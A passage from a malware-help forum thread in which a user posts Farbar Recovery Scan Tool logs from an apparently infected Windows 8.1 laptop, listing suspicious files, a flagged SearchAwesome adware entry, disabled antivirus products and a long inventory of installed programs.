2018-05-15 20:14 - 2018-05-15 20:14 - 000000000 ____D C:\Users\Dan\AppData\Local\dwczukm
2018-05-14 20:11 - 2018-05-14 20:11 - 000000000 ____D C:\Users\Dan\AppData\Local\wihnxoc
2018-05-13 20:26 - 2018-05-13 20:26 - 000000000 ____D C:\Users\Dan\AppData\Local\dwockil
2018-05-12 19:41 - 2018-05-12 19:41 - 000000000 ____D C:\Users\Dan\AppData\Local\csdhnlo
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2018-06-11 21:51 - 2018-03-22 21:52 - 000000004 _____ C:\ProgramData\lock.dat
2018-06-11 21:51 - 2016-03-03 14:05 - 000000000 ____D C:\FRST
2018-06-11 21:49 - 2016-06-12 19:00 - 000000000 ____D C:\Users\Dan\.smplayer
2018-06-11 21:46 - 2015-02-09 00:09 - 000000000 __RDO C:\Users\Dan\OneDrive
2018-06-11 21:44 - 2017-03-29 19:14 - 000000074 _____ C:\Users\Dan\AppData\Roaming\sp_data.sys
2018-06-11 21:41 - 2015-02-01 10:08 - 000000000 ____D C:\Users\Dan\AppData\Local\Adobe
2018-06-11 21:40 - 2015-11-12 20:24 - 000000000 ____D C:\ProgramData\VMware
2018-06-11 21:38 - 2018-03-22 21:53 - 000000000 ____D C:\Users\Dan\AppData\Local\aucozre
2018-06-11 21:38 - 2018-03-22 21:52 - 000000356 _____ C:\ProgramData\rwi.hhad
2018-06-11 21:37 - 2015-11-13 20:19 - 000000000 ____D C:\ProgramData\Gramblr
2018-06-11 21:36 - 2018-03-22 21:52 - 002888704 _____ (TOSHIBA CORPORATION) C:\Windows\system32\avmhengsvc.exe
2018-06-11 21:36 - 2013-08-22 10:45 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2018-06-11 21:35 - 2013-08-22 09:25 - 012582912 _____ C:\Windows\system32\config\HARDWARE
2018-06-11 21:35 - 2013-08-22 09:25 - 000524288 ___SH C:\Windows\system32\config\BBI
2018-06-10 22:57 - 2015-02-03 07:57 - 000000000 ____D C:\Users\Dan\AppData\Local\ocenaudio
2018-06-09 23:31 - 2015-02-05 08:20 - 000000000 ____D C:\Users\Dan\AppData\Roaming\vlc
2018-06-08 20:32 - 2013-08-22 09:36 - 000000000 ____D C:\Windows\Inf
2018-06-07 21:59 - 2016-08-26 20:21 - 000000000 ____D C:\Users\Dan\Documents\A - RESTORED FILES - DAN
2018-06-02 21:58 - 2016-07-05 19:49 - 000000000 ____D C:\ProgramData\boost_interprocess
2018-05-31 20:45 - 2016-07-18 13:30 - 000000000 ____D C:\Users\Dan\Desktop\Video & Various  Software Shortcuts
2018-05-29 22:18 - 2018-03-24 18:39 - 000000000 ____D C:\Users\Dan\AppData\Local\ElevatedDiagnostics
2018-05-29 21:19 - 2017-01-25 19:42 - 000000000 ____D C:\Windows\Minidump
2018-05-29 21:19 - 2016-03-07 20:08 - 000000000 ____D C:\Users\Dan\AppData\Local\CrashDumps
2018-05-29 21:04 - 2018-03-22 21:50 - 000003626 _____ C:\Windows\System32\Tasks\{81D52804-7B29-49D2-80AA-07954E82952B}
2018-05-29 21:04 - 2018-03-22 21:50 - 000003424 _____ C:\Windows\System32\Tasks\{C26243DB-2C37-44EE-9F28-CE2E8B7FC0E3}
2018-05-29 21:04 - 2016-06-16 10:58 - 000003030 _____ C:\Windows\System32\Tasks\{31DDBD37-5DB7-4030-8064-10B0CAA806C3}
2018-05-29 21:04 - 2015-02-11 20:37 - 000003378 _____ C:\Windows\System32\Tasks\{CF06CADB-185A-4E37-941E-EF8A74A640B8}
2018-05-29 21:04 - 2015-02-11 20:32 - 000003286 _____ C:\Windows\System32\Tasks\{7AABF775-AB66-4734-B6C6-CD26D49E39AF}
2018-05-29 20:47 - 2018-03-22 21:51 - 000000000 ____D C:\Program Files (x86)\s5
2018-05-29 20:36 - 2013-08-22 11:36 - 000000000 ____D C:\Windows\system32\NDF
2018-05-24 20:30 - 2014-03-18 05:47 - 001164886 _____ C:\Windows\system32\PerfStringBackup.INI
2018-05-23 21:13 - 2016-07-10 13:03 - 000000000 ____D C:\Users\Dan\AppData\Local\gtk-2.0
2018-05-23 21:13 - 2015-02-04 11:43 - 000000000 ____D C:\Users\Dan\.gimp-2.8
 
==================== Files in the root of some directories =======
 
2018-03-22 21:52 - 2018-06-11 21:51 - 000000004 _____ () C:\ProgramData\lock.dat
2018-03-23 18:46 - 2018-03-23 18:46 - 000267264 _____ () C:\ProgramData\TeamVieverService.dll
1623-04-04 13:03 - 1623-04-04 13:03 - 000055808 ____N (Microsoft Corporation) C:\Program Files (x86)\pAuZbg.exe
1623-04-04 13:03 - 1623-04-04 13:03 - 000055808 ____N (Microsoft Corporation) C:\Program Files (x86)\YuIeaAuVrYQ.exe
2018-03-22 21:50 - 2018-03-22 21:50 - 000481104 _____ (DriverPack) C:\Users\Dan\AppData\Roaming\DRP.exe
2017-03-29 19:14 - 2018-06-11 21:44 - 000000074 _____ () C:\Users\Dan\AppData\Roaming\sp_data.sys
2018-03-22 21:49 - 2018-03-22 21:49 - 000724992 _____ () C:\Users\Dan\AppData\Roaming\virtualexechange.exe
2018-03-22 21:49 - 2018-03-22 21:49 - 000000001 _____ () C:\Users\Dan\AppData\Roaming\w.txt
2015-02-02 09:28 - 2015-02-03 07:25 - 000000068 _____ () C:\Users\Dan\AppData\Roaming\WB.CFG
2015-01-25 12:12 - 2016-03-06 16:31 - 000000365 _____ () C:\Users\Dan\AppData\Roaming\WPLAEHX
2015-04-29 13:39 - 2015-04-29 13:39 - 000200331 _____ () C:\Users\Dan\AppData\Local\59ED2468_stp.CIS
2015-04-29 13:39 - 2015-04-29 13:39 - 000000290 _____ () C:\Users\Dan\AppData\Local\59ED2468_stp.CIS.part
2015-04-29 13:34 - 2015-04-29 13:34 - 000385602 _____ () C:\Users\Dan\AppData\Local\5D515C96_stp.CIS
2015-04-29 13:34 - 2015-04-29 13:38 - 000000220 _____ () C:\Users\Dan\AppData\Local\5D515C96_stp.CIS.part
2015-04-29 13:39 - 2015-04-29 13:39 - 000146145 _____ () C:\Users\Dan\AppData\Local\708F4E7A_stp.CIS
2015-04-29 13:39 - 2015-04-29 13:39 - 000000274 _____ () C:\Users\Dan\AppData\Local\708F4E7A_stp.CIS.part
1623-04-04 13:03 - 1623-04-04 13:03 - 000192512 ____N (Microsoft Corporation) C:\Users\Dan\AppData\Local\agjCu.exe
2015-09-05 13:42 - 2016-04-20 16:08 - 000017920 _____ () C:\Users\Dan\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2018-05-23 21:13 - 2018-05-23 21:13 - 000081134 _____ () C:\Users\Dan\AppData\Local\recently-used.xbel
2018-06-11 21:49 - 2018-06-11 21:49 - 000000077 _____ () C:\Users\Dan\AppData\Local\smplayerhdpi.ini
2018-03-22 21:50 - 2018-03-22 21:50 - 000000003 _____ () C:\Users\Dan\AppData\Local\wbem.ini
 
==================== Bamital & volsnap ======================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
C:\Windows\system32\drivers\cooehlor.sys -> Access Denied <======= ATTENTION
 
LastRegBack: 2018-05-29 22:18
 
==================== End of FRST.txt ============================


#25 danban

danban
  • Topic Starter

  • Members
  • 119 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bronx New York
  • Local time:03:17 AM

Posted 12 June 2018 - 09:42 AM

Here's the Addition txt

 

 

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 06.06.2018 01
Ran by Dan (11-06-2018 21:53:50)
Running from D:\
Windows 8.1 Connected (Update) (X64) (2015-01-30 09:55:12)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-1066246007-1091995785-1061003623-500 - Administrator - Disabled)
Dan (S-1-5-21-1066246007-1091995785-1061003623-1001 - Administrator - Enabled) => C:\Users\Dan
Guest (S-1-5-21-1066246007-1091995785-1061003623-501 - Limited - Disabled)
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Bitdefender Antivirus Free Edition (Disabled - Up to date) {3FB17364-4FCC-0FA7-6BBF-973897395371}
AS: Bitdefender Antivirus Free Edition (Disabled - Up to date) {84D09280-69F6-0029-510F-AC4AECBE19CC}
AS: Comodo Defense+ (Disabled - Up to date) {6BAD9487-8DE8-D130-293E-C6A728B4104F}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: COMODO Firewall (Disabled) {E8F7F446-E1BD-DFE6-38D1-54E0ADE01D89}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
4K Video Downloader 4.4 (HKLM-x32\...\{CAB406EC-AF92-417D-9BBB-B2ECE1BC7BA6}) (Version: 4.4.2.2255 - Open Media LLC)
7-Zip (HKLM\...\{F43D5365-6E1C-4A2B-BE51-E16D9554FB1D}) (Version: 9.2.0 - 7-Zip) Hidden
7-Zip (HKLM-x32\...\7-Zip 9.2.0) (Version: 9.2.0 - 7-Zip)
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 18.011.20038 - Adobe Systems Incorporated)
Adobe After Effects CC 2015.3 (HKLM-x32\...\AEFT_13_8_0) (Version: 13.8.0 - Adobe Systems Incorporated)
Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 3.8.0.310 - Adobe Systems Incorporated)
Adobe Media Encoder CC 2015.3 (HKLM-x32\...\AME_10_3_0) (Version: 10.3.0 - Adobe Systems Incorporated)
Adobe Premiere Pro CC 2015 (HKLM-x32\...\{38C72D42-0672-43B1-9E05-E7631684F9A1}) (Version: 9.0.0 - Adobe Systems Incorporated)
Aeon (HKLM-x32\...\Aeon) (Version: 3.7.4 - SoundSpectrum)
Andy OS (HKLM\...\Andy OS) (Version: 0.45.5.0 - Andy OS, Inc)
Apple Application Support (HKLM-x32\...\{5D09C772-ECB3-442B-9CC6-B4341C78FDC2}) (Version: 2.3.4 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Applian Director (HKLM-x32\...\Applian Director3.01) (Version: 3.01 - Applian Technologies Inc.)
ASIO4ALL (HKLM-x32\...\ASIO4ALL) (Version: 2.12 - Michael Tippach)
ASUS Live Update (HKLM-x32\...\{FA540E67-095C-4A1B-97BA-4D547DEC9AF4}) (Version: 3.2.8 - ASUS)
ASUS Screen Saver (HKLM-x32\...\{0FBEEDF8-30FA-4FA3-B31F-C9C7E7E8DFA2}) (Version: 1.0.3 - ASUS)
ASUS Smart Gesture (HKLM-x32\...\{4D3286A6-F6AB-498A-82A4-E4F040529F3D}) (Version: 2.2.14 - ASUS)
ASUS Splendid Video Enhancement Technology (HKLM-x32\...\{0969AF05-4FF6-4C00-9406-43599238DE0D}) (Version: 2.01.0021 - ASUS)
ASUSDVD (HKLM-x32\...\{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}) (Version: 10.0.5712.52 - CyberLink Corp.) Hidden
ASUSDVD (HKLM-x32\...\InstallShield_{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}) (Version: 10.0.5712.52 - CyberLink Corp.)
AsusVibe2.0 (HKLM-x32\...\Asus Vibe2.0) (Version: 2.0.12.311 - ASUSTEK)
AVS Audio Converter 8.1.1 (HKLM-x32\...\AVS Audio Converter_is1) (Version: 8.1.1.549 - Online Media Technologies Ltd.)
AVS Audio Editor 8.1.1 (HKLM-x32\...\AVS Audio Editor_is1) (Version: 8.1.1.506 - Online Media Technologies Ltd.)
AVS Disc Creator 5.2.5 (HKLM-x32\...\AVS Disc Creator_is1) (Version: 5.2.5.536 - Online Media Technologies Ltd.)
AVS Document Converter 3.0.2 (HKLM-x32\...\AVS Document Converter_is1) (Version: 3.0.2.238 - Online Media Technologies Ltd.)
AVS Image Converter 4.0.2 (HKLM-x32\...\AVS Image Converter_is1) (Version: 4.0.2.281 - Online Media Technologies Ltd.)
AVS Media Player 4.3.1 (HKLM-x32\...\AVS Media Player_is1) (Version: 4.3.1.114 - Online Media Technologies Ltd.)
AVS Photo Editor 2.3.4 (HKLM-x32\...\AVS Photo Editor_is1) (Version: 2.3.4.148 - Online Media Technologies Ltd.)
AVS Registry Cleaner 3.0.3 (HKLM-x32\...\AVS Registry Cleaner_is1) (Version: 3.0.3.272 - Online Media Technologies Ltd.)
AVS Video Converter 9.2.1 (HKLM-x32\...\AVS4YOU Video Converter 7_is1) (Version: 9.2.1.579 - Online Media Technologies Ltd.)
AVS Video Editor 7.2.1 (HKLM-x32\...\AVS Video Editor_is1) (Version: 7.2.1.269 - Online Media Technologies Ltd.)
AVS Video ReMaker 5.0.2 (HKLM-x32\...\AVS Video ReMaker_is1) (Version: 5.0.2.175 - Online Media Technologies Ltd.)
Bandicam (HKLM-x32\...\Bandicam) (Version: 3.0.4.1036 - Bandisoft.com)
Bandicut (HKLM-x32\...\Bandicut) (Version: 1.2.7.132 - Bandisoft.com)
Bandisoft MPEG-1 Decoder (HKLM-x32\...\BandiMPEG1) (Version:  - Bandisoft.com)
Beta Bugs FloFi VST (HKLM-x32\...\FloFi) (Version: "1.1.0" - "BetaBugs")
Beta Bugs Moneo VST (HKLM-x32\...\Moneo) (Version: "1.0.0" - "BetaBugs")
Beta Bugs WideBug VST (HKLM-x32\...\WideBug) (Version: "1.0.0" - "BetaBugs")
Bitdefender Antivirus Free Edition (HKLM\...\BitDefender Gonzales) (Version: 1.0.21.1109 - Bitdefender)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
CCleaner (HKLM\...\CCleaner) (Version: 5.15 - Piriform)
COMODO Firewall (HKLM\...\{1EBC6C6F-7D31-4897-B241-DC7052F3E7A5}) (Version: 8.2.0.5027 - COMODO Security Solutions Inc.)
CrazyTalk Animator v2.0 Pipeline (HKLM-x32\...\{7127D4CC-78E6-41E3-8BCB-A50ED34846E2}) (Version: 2.0.1214.1 - Reallusion Inc.)
CrazyTalk v7.32 Standard (HKLM-x32\...\{27C4EA98-84A3-4CDF-A436-F984A0283357}) (Version: 7.32.3114.1 - Reallusion Inc.)
D3DX10 (HKLM-x32\...\{E09C4DB7-630C-4F06-A631-8EA7239923AF}) (Version: 15.4.2368.0902 - Microsoft) Hidden
DaVinci Resolve (HKLM\...\{9B4515CC-A703-49D2-85E6-5348CA30534D}) (Version: 12.5.0032 - Blackmagic Design)
DS-MP3 Source 1.30 (HKLM-x32\...\DS-MP3 Source) (Version:  - )
Eusing Free MP3 Cutter (HKLM-x32\...\Eusing Free MP3 Cutter) (Version:  - )
FaceGen Artist Demo (HKLM-x32\...\{280BB5D8-30DC-4D62-B4D5-A3C19BB30479}) (Version: 1.10.0.0 - Singular Inversions Inc.)
FaceGen Artist Pro (HKLM-x32\...\{F6F73B62-D4E0-46B0-BD1C-3F4F55B107D8}) (Version: 1.10.0.0 - Singular Inversions Inc.)
Flvto Youtube Downloader (HKLM-x32\...\Flvto Youtube Downloader) (Version: 0.6.9 - Hotger)
Gadwin PrintScreen (64-Bit) (HKLM\...\{819A52E1-0929-469A-BEB6-1AEBE0873CFC}) (Version: 5.4.2.0 - Gadwin Systems)
GIMP 2.8.16 (HKLM\...\GIMP-2_is1) (Version: 2.8.16 - The GIMP Team)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 65.0.3325.181 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.7 - Google Inc.) Hidden
Gramblr (HKLM\...\Gramblr) (Version: 2.9.127 - Gramblr Team)
GROOVE 5.6.3 Pro Edition (HKLM\...\{21D8E7FE-7FE7-46B3-B578-22E1ABC5E407}) (Version: 5.6.3 - Gemini)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3355 - Intel Corporation)
Intel® Sideband Fabric Device Driver (HKLM-x32\...\C5A8BC6E-723A-4C0F-96E1-C426D1A4BCA9) (Version: 1.0.0.1002 - Intel Corporation)
Intel® Trusted Execution Engine (HKLM\...\{176E2755-0A17-42C6-88E2-192AB2131278}) (Version: 1.0.0.1064 - Intel Corporation)
ISSE version 0.2.0 (HKLM\...\{9330BAEC-6E26-4C5B-93A1-8BDD9ACF231B}_is1) (Version: 0.2.0 - CCRMA, Stanford University)
ivsEdits Free Edition (HKLM-x32\...\ivsEdits Free Edition) (Version:  - )
Java 8 Update 73 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218073F0}) (Version: 8.0.730.2 - Oracle Corporation)
JBridge (HKLM-x32\...\JBridge) (Version:  - JBridge)
Junk Mail filter update (HKLM-x32\...\{0BE9E708-5DC0-4963-9CFD-0AA519090E79}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
KRISTAL Audio Engine (HKLM-x32\...\KRISTAL Audio Engine) (Version:  - )
Lightworks (HKLM-x32\...\{E94DD4E4-7746-472c-AA7B-1242FED0CFC8}) (Version: 12.6.0.0 - Lightworks)
LUXONIX LFX-1310 (HKLM-x32\...\LUXONIX_LFX-1310) (Version: 1.4 - LUXONIX)
MakeMKV v1.9.1 (HKLM-x32\...\MakeMKV) (Version: v1.9.1 - GuinpinSoft inc)
Massey Plugins Demos [Remove only] (HKLM-x32\...\Massey Plugins Demos) (Version:  - )
MediaShuttlePlugin-v5.4 (HKLM-x32\...\{BA567CFA-F158-44C3-AA40-1773478BD477}) (Version: 5.4.4.71844 - Signiant Inc.)
Microsoft Office (HKLM-x32\...\{90150000-0138-0409-0000-0000000FF1CE}) (Version: 15.0.4569.1506 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\OneDriveSetup.exe) (Version: 18.025.0204.0009 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23918 (HKLM-x32\...\{dab68466-3a7d-41a8-a5cf-415e3ff8ef71}) (Version: 14.0.23918.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Movavi Video Editor 11 (HKLM-x32\...\Movavi Video Editor 11) (Version: 11.4.1 - Movavi)
Movavi Video Suite 12 (HKLM-x32\...\Movavi Video Suite 12) (Version: 12.0.0 - Movavi)
Movie Maker (HKLM-x32\...\{38F03569-A636-4CF3-BDDE-032C8C251304}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Movie Maker (HKLM-x32\...\{DD67BE4B-7E62-4215-AFA3-F123A800A389}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Mozilla Firefox 55.0.3 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 55.0.3 (x86 en-US)) (Version: 55.0.3 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 54.0 - Mozilla)
mp3splt-gtk (HKLM-x32\...\mp3splt-gtk) (Version:  - )
Muvizu:Play - Heroes and villains (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuHeroesAndVillains) (Version:  - Digimania Ltd)
Muvizu:Play - Heroes and villains Lairs (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuHeroAndVillainLairs) (Version:  - Digimania Ltd)
Muvizu:Play - Lighting Presets (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuLightingPresets) (Version:  - Digimania Ltd)
Muvizu:Play - Mandy Content (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuMandyContentPack) (Version:  - Digimania Ltd)
Muvizu:Play - Prisons (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuPrisons) (Version:  - Digimania Ltd)
Muvizu:Play - Rosie (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuRosie) (Version:  - Digimania Ltd)
Muvizu:Play - Trains (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuTrains) (Version:  - Digimania Ltd)
Muvizu:Play (HKLM-x32\...\Muvizu) (Version: 2015.08.20.01R - Digimania Ltd)
ocenaudio (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\ocenaudio) (Version: 2.0.14 - ocenaudio Team)
PitchWorks remove (HKLM-x32\...\PitchWorks DX) (Version:  - )
PrimoPDF -- brought to you by Nitro PDF Software (HKLM-x32\...\PrimoPDF) (Version: 5 - Nitro PDF Software)
Qualcomm Atheros Client Installation Program (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 10.0 - Qualcomm Atheros)
QuickTime (HKLM-x32\...\{B67BAFBA-4C9F-48FA-9496-933E3B255044}) (Version: 7.74.80.86 - Apple Inc.)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.2.9200.27040 - Realtek Semiconductor Corp.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.20.815.2013 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7213 - Realtek Semiconductor Corp.)
Recuva (HKLM\...\Recuva) (Version: 1.52 - Piriform)
Replay Media Catcher 5 (5.0.1.54) (HKLM-x32\...\Replay Media Catcher 5) (Version: 5.0.1.54 - Applian Technologies)
Replay Video Capture 7 (HKLM-x32\...\Replay Video Capture7.4) (Version: 7.4 - Applian Technologies Inc.)
SearchAwesome (HKLM\...\6320c4d4d9492959f6f8b43b8fdbf2f5) (Version: 13.14.1.204 (i1.0) - SearchAwesome) <==== ATTENTION
ShapeShop B5 (HKLM-x32\...\ShapeShop) (Version:  - )
Skype™ 7.33 (HKLM-x32\...\{3B7E914A-93D5-4A29-92BB-AF8C3F66C431}) (Version: 7.33.105 - Skype Technologies S.A.)
SMPlayer 16.6.0 (HKLM-x32\...\SMPlayer) (Version: 16.6.0 - Ricardo Villalba)
Softube Plug-Ins (VST AAX 32-bit) (HKLM-x32\...\Softube Plug-Ins (VST AAX 32-bit)) (Version: 2.2.91 - Softube AB)
Synfig Studio (HKLM-x32\...\synfigstudio) (Version: 1.0.2 - )
Total Recorder 8.5 Standard Edition (HKLM-x32\...\TotalRecorder) (Version:  - )
Tupi version 0.2-4 (HKLM-x32\...\Tupi_is1) (Version: 0.2-4 - )
Tweaking.com - Windows Repair (HKLM-x32\...\Tweaking.com - Windows Repair) (Version: 3.8.3 - Tweaking.com)
Update Installer for WildTangent Games App (HKLM-x32\...\{2FA94A64-C84E-49d1-97DD-7BF06C7BBFB2}.WildTangent Games App) (Version:  - WildTangent) Hidden
Virtual Magnifying Glass v3.6 (HKLM-x32\...\Virtual Magnifying Glass_is1) (Version:  - )
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.4 - VideoLAN)
VMware Player (HKLM\...\{E452E727-86B8-4233-8CC3-41FD817AFAFF}) (Version: 6.0.7 - VMware, Inc.) Hidden
VMware VIX (HKLM-x32\...\{F99FC179-EA67-4BBC-8955-BDDA0CB94B88}) (Version: 1.13.7.62285 - VMware, Inc.)
WD My Cloud (HKLM\...\{3082756C-2147-411F-AE6A-9DCEF0121903}) (Version: 1.0.7.5 - Western Digital Technologies, Inc.)
WebStorage (HKLM-x32\...\WebStorage) (Version: 2.1.2.301 - ASUS Cloud Corporation)
WhiteCap (HKLM-x32\...\WhiteCap) (Version: 5.0.5 - SoundSpectrum)
WildTangent Games App (HKLM-x32\...\{70B446D1-E03B-4ab0-9B3C-0832142C9AA8}.WildTangent Games App-asus) (Version: 4.0.11.2 - WildTangent)
Winamp (HKLM-x32\...\Winamp) (Version: 5.666  - Nullsoft, Inc)
Windows Driver Package - ASUS (ATP) Mouse  (03/17/2014 1.0.0.207) (HKLM\...\AA2CC56D4BBEE037DC99871F5F6551133D2A0CC3) (Version: 03/17/2014 1.0.0.207 - ASUS)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
Windows Media Encoder 9 Series (HKLM-x32\...\Windows Media Encoder 9) (Version:  - )
WinFlash (HKLM-x32\...\{8F21291E-0444-4B1D-B9F9-4370A73E346D}) (Version: 2.42.0 - ASUS)
WinPcap 4.1.3 (HKLM-x32\...\WinPcapInst) (Version: 4.1.0.2980 - Riverbed Technology, Inc.)
WinRAR 5.31 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 5.31.0 - win.rar GmbH)
WinX DVD Ripper Platinum 7.5.18 (HKLM-x32\...\WinX DVD Ripper Platinum_is1) (Version:  - Digiarty Software, Inc.)
WonderFox DVD Ripper Speedy 8.1 (HKLM-x32\...\WonderFox DVD Ripper Speedy) (Version: 8.1 - WonderFox Soft, Inc.)
WonderFox DVD Video Converter 10.0 (HKLM-x32\...\WonderFox DVD Video Converter) (Version: 10.0 - WonderFox Soft, Inc.)
Yahoo! Toolbar (HKLM-x32\...\Yahoo! Companion) (Version:  - Yahoo! Inc.)
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\ChromeHTML: ->  <==== ATTENTION
